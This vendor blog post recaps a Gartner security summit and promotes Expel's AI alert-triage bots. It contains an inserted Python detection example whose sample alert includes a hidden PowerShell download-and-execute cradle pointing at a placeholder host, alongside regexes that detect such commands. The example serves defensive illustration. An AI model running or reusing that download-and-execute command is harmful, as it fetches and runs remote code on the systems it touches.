Security operations · 3 MIN READ · KIM MAHONEY · JUN 14, 2024 · TAGS: AI / MDR / SOC
I recently attended my first Gartner Security & Risk Management Summit (hooray me!). Similar to RSA Conference a few weeks ago, the sessions and conversations were all about AI and its potential uses for security teams. AI is certainly the buzzword du jour at all security conferences and it features in all the big vendor announcements lately. Now that the dust has settled, here are my thoughts:
AI evolution over revolution
What I liked most about the sessions I attended was the realistic expectations and honesty about what security teams can actually do with AI, and what they can’t. This pragmatic approach is in stark contrast to events last year, where AI was shoehorned into every session, whether it applied or not.
Of the many sessions I attended, here are a couple of my key takeaways on how AI can help SOC teams:
- In the next 12 months, the opportunities for AI will likely be more evolutionary than revolutionary. Gartner predicts that it will be another year (2025) before we can glean any real value from generative AI workflows.
- Simply employing AI is not going to replace bodies on your SOC team. In fact, it may require new bodies and new skills in the form of developers. However, it can help supplement security workflows. For example, AI tools can generate the dreaded after-incident report write-ups, but of course those reports still need to be reviewed and edited by human analysts.
- There are distinct and specific use cases for both automations and AI in hyper-scaling your SOC team, depending on the problems that need solving.
- AI is not going to solve all modern SOC problems, such as resource gaps, but it can help in a couple of key areas, including: improving threat detection and incident response (what Gartner calls TDIR) outcomes, helping prevent SOC team burnout, and applying threat intel lessons and continuous threat exposure management (CTEM) to enhance detection engineering.
It turns out that AI will likely not bring a total revolution to security (despite what some vendors claim). But all this talk got me thinking about how Expel MDR has already been reaping the benefits of AI and automation. Expel Workbench™, our security operations platform, employs AI-powered automations to improve our analyst experience, and utilizes external and internal threat intelligence insights to consistently enhance our detections—and it has since our inception.
How Expel uses AI and automations to improve threat detection and response outcomes
AI tools like our Josie® bot help our SOC team comb through the millions of alerts in customers’ environments each day. Josie acts as our ‘judge’: by applying our Expel-written detection rules, it determines whether an alert warrants further investigation by our SOC team and weeds out false positives early.
One of our customers said it best:
“Out of a million events, 99.5% of them are filtered out in triage by AI and machine learning…” -Ben Uhlig, CentroMotion
Once an alert is deemed an ‘Expel alert,’ a second bot, named Ruxie™, kicks in to provide more context. For example, if Microsoft Defender or CrowdStrike Falcon alerts on a suspicious PowerShell script, Ruxie automatically translates the code and intent of the script (a tedious job usually reserved for analysts). This saves precious minutes, if not hours, of translation time for our team. Ruxie then compares the decoded script to other attacks we’ve seen in customer environments or from external threat intelligence, and to known MITRE TTPs, within our Global Context data lake.
If more information is required, Ruxie brings in additional context from across the customer’s environment, including correlating data from their endpoint/network environments, identity and SaaS workplace tools, and cloud workload and control plane data to find any other signals that help our analysts perform a more in-depth investigation of the alert. This greatly reduces the amount of time it takes our analysts to investigate the alert by surfacing all of the contextual information needed in Expel Workbench before they even open the investigation. Our focus on improving our analyst experience is one of the main reasons why our customers love us, and also why our SOC team has a great analyst retention rate.
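To make the judge-then-enrich flow described above concrete, here is an added example (my own illustration, not code from Expel Workbench, Josie or Ruxie): a small Python pipeline that applies a constructed detection rule to sample PowerShell alerts, decodes the base64/UTF-16LE payload behind -EncodedCommand for the alerts that pass, and tags the decoded script with MITRE ATT&CK technique IDs so an analyst opens the case with the context already surfaced. The sample alerts, the parent-process allowlist and the regex patterns are constructed placeholders; a real deployment would draw them from tuned detection content and threat intelligence.

```python
"""Illustrative SOC triage pipeline: rule-based judge, PowerShell decoding,
and MITRE ATT&CK tagging. Added example, not Expel's code."""
import base64
import re
from typing import Optional

# --- Constructed sample data (not real customer telemetry) -----------------
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running'"
SUSPICIOUS_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
)


def to_encoded_command(script: str) -> str:
    """PowerShell's -EncodedCommand carries base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


SAMPLE_ALERTS = [
    {   # inventory script launched by a known management agent
        "id": "a-1", "parent": "CcmExec.exe", "user": "NT AUTHORITY\\SYSTEM",
        "cmdline": "powershell.exe -NoProfile -EncodedCommand "
                   + to_encoded_command(BENIGN_SCRIPT),
    },
    {   # hidden-window download cradle spawned from an Office process
        "id": "a-2", "parent": "WINWORD.EXE", "user": "CORP\\jdoe",
        "cmdline": "powershell.exe -w hidden -nop -enc "
                   + to_encoded_command(SUSPICIOUS_SCRIPT),
    },
    {   # plain interactive use, nothing encoded
        "id": "a-3", "parent": "explorer.exe", "user": "CORP\\admin",
        "cmdline": "powershell.exe Get-Process",
    },
]

# Hypothetical allowlist of management agents that legitimately launch encoded
# PowerShell; in practice an analyst tunes this per customer environment.
KNOWN_ADMIN_PARENTS = {"CcmExec.exe"}
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE"}
# Common spellings of the -EncodedCommand switch followed by its argument.
ENC_FLAG = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+(\S+)", re.IGNORECASE)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

# Constructed pattern -> technique table for the enrichment stage.
TTP_PATTERNS = [
    (re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE), "T1059.001 PowerShell"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.IGNORECASE),
     "T1105 Ingress Tool Transfer"),
    (HIDDEN_FLAG, "T1564.003 Hidden Window"),
]


def judge(alert: dict) -> str:
    """Stage 1 (the 'judge'): apply detection rules, return 'filtered' or 'expel_alert'."""
    cmd = alert["cmdline"]
    encoded = ENC_FLAG.search(cmd) is not None
    hidden = HIDDEN_FLAG.search(cmd) is not None
    if alert["parent"] in OFFICE_PARENTS:
        return "expel_alert"   # Office spawning PowerShell is rarely expected
    if encoded and alert["parent"] in KNOWN_ADMIN_PARENTS:
        return "filtered"      # management agent: expected, weed out early
    if encoded or hidden:
        return "expel_alert"
    return "filtered"          # low-signal, nothing for a human to look at


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def map_ttps(cmdline: str, decoded: Optional[str]) -> list:
    """Stage 2 enrichment: tag command line plus decoded script with ATT&CK IDs."""
    tags = set()
    if decoded is not None:
        tags.add("T1027 Obfuscated Files or Information")  # the encoding itself
    text = cmdline + "\n" + (decoded or "")
    for pattern, ttp in TTP_PATTERNS:
        if pattern.search(text):
            tags.add(ttp)
    return sorted(tags)


def triage(alerts: list) -> list:
    """Run judge, then enrich only the alerts that survive, as an analyst would want."""
    results = []
    for alert in alerts:
        rec = {"id": alert["id"], "verdict": judge(alert), "decoded": None, "ttps": []}
        if rec["verdict"] == "expel_alert":
            rec["decoded"] = decode_encoded_command(alert["cmdline"])
            rec["ttps"] = map_ttps(alert["cmdline"], rec["decoded"])
        results.append(rec)
    return results


if __name__ == "__main__":
    for record in triage(SAMPLE_ALERTS):
        print(record)
```

Running the block prints one record per sample alert: the management-agent and interactive alerts are filtered, while the Office-spawned alert is escalated with its decoded script and four technique tags attached. The enrichment only runs on escalated alerts, which mirrors the point of doing the cheap rule-based judging first: decoding and correlation effort is spent where a human will actually read the result.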
It was encouraging to hear, at the Gartner event, the fairly consistent theme that AI will play a pragmatic role in the SOC, and that the overstated hype of yesteryear has died down. The truth is that AI can make humans better at security operations—which is something we’ve been preaching for a while. If you’re interested in learning more about how Expel MDR uses AI to improve detection and response outcomes for customers, drop us a line.